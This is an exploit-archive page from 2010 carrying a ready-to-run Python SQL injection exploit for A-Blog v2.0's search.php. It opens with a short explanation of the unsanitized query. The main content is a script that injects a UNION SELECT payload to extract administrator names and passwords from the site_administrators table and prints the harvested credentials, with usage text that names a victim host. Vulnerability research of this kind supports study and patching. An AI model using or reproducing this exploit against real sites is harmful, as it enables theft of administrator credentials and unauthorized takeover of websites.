A-Blog v2.0 (sources/search.php) SQL Injection Exploit
Posted on 05 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>A-Blog v2.0 (sources/search.php) SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================== A-Blog v2.0 (sources/search.php) SQL Injection Exploit ====================================================== #!/usr/bin/python # # Exploit Title: A-Blog v2.0 (sources/search.php) SQL Injection Exploit # Date : 05 September 2010 # Author : Ptrace Security (Gianni Gnesa [gnix]) # Contact : research[at]ptrace-security[dot]com # Software Link: http://sourceforge.net/projects/a-blog/ # Version : 2.0 # Tested on : EasyPHP 5.3.1.0 for Windows with Python 3.1 # # # Description # =========== # # + sources/search.php => This few lines of code strip whitespaces from the # beginning and end of the 'words' GET parameter. Then, # all the whitespaces are replaced with %. # # 12: if ((array_key_exists('words', $_GET)) && ($_GET['words'] == '')) { # 13: callback_js("page=results&words=$searchwords"); # 14: } # 15: # 16: else{ # 17: if ((array_key_exists('words', $_GET))) { # 18: $words2 = trim($_GET['words']); # 19: } # 20: $search = str_replace(" ", "%", "$words2"); # 21: } # # # + sources/search.php => The string returned from the previous code is used in # the query below without being sanitized. # # 33: $sql = "SELECT * FROM site_news WHERE title LIKE '%$search%' OR home_text # LIKE '%$search%' OR extended_text LIKE '%$search%'"; # 34: $sql_result = mysql_query($sql,$connection) or die ("Couldnt execute query"); # # # + sources/search.php => Then, the results are echoed # # 39: while($row = mysql_fetch_array($sql_result)){ # 40: # 41: $id = $row['nid']; # 42: $title = $row['title']; # 43: $home = $row['home_text']; # 44: $extended = $row['extended_text']; # 45: # 46: echo "<li><a href='blog.php?view=news&id=$id' title='Read $title'>$title</a></li>"; # 47: } # import re import sys import textwrap import http.client def usage(program): print('Usage : ' + program + ' <victim hostname> <path> ') print('Example: ' + program + ' localhost /A-BlogV2/') print(' ' + program + ' www.victim.com /complete/path/') return def removeDuplicates(mylist): d = {} for elem in mylist: d[elem] = 1 return list(d.keys()) def exploit(target, path): payload = 'search.php?words=%25%27/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/1%2C' payload += 'CONCAT%28%27%3C1%3E%27%2Cname%2C%27%3A%27%2Cpassword%2C%27%3C2' payload += '%3E%27%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10/%2A%2A/FROM/%2A%2A/' payload += 'site_administrators/%2A%2A/%23' print('[+] Sending HTTP request ') print(textwrap.fill('GET ' + path + payload) + ' ') con = http.client.HTTPConnection(target) con.request('GET', path + payload) res = con.getresponse() if res.status != 200: print('[!] HTTP GET request failed') exit(1) print('[+] Parsing HTTP response') data = res.read().decode() pattern = re.compile(r"<1>([w:]+?)<2>", re.M) credentials = removeDuplicates(pattern.findall(data)) if len(credentials) > 0: print('[+] Credentials found ') for element in credentials: print(element) else: print('[!] Credentials not found') return print(' +---------------------------------------------------------------------------+') print('| A-Blog v2.0 (sources/search.php) SQL Injection Exploit by Ptrace Security |') print('+---------------------------------------------------------------------------+ ') if len(sys.argv) != 3: usage(sys.argv[0]) else: exploit(sys.argv[1], sys.argv[2]) exit(0) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-05]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
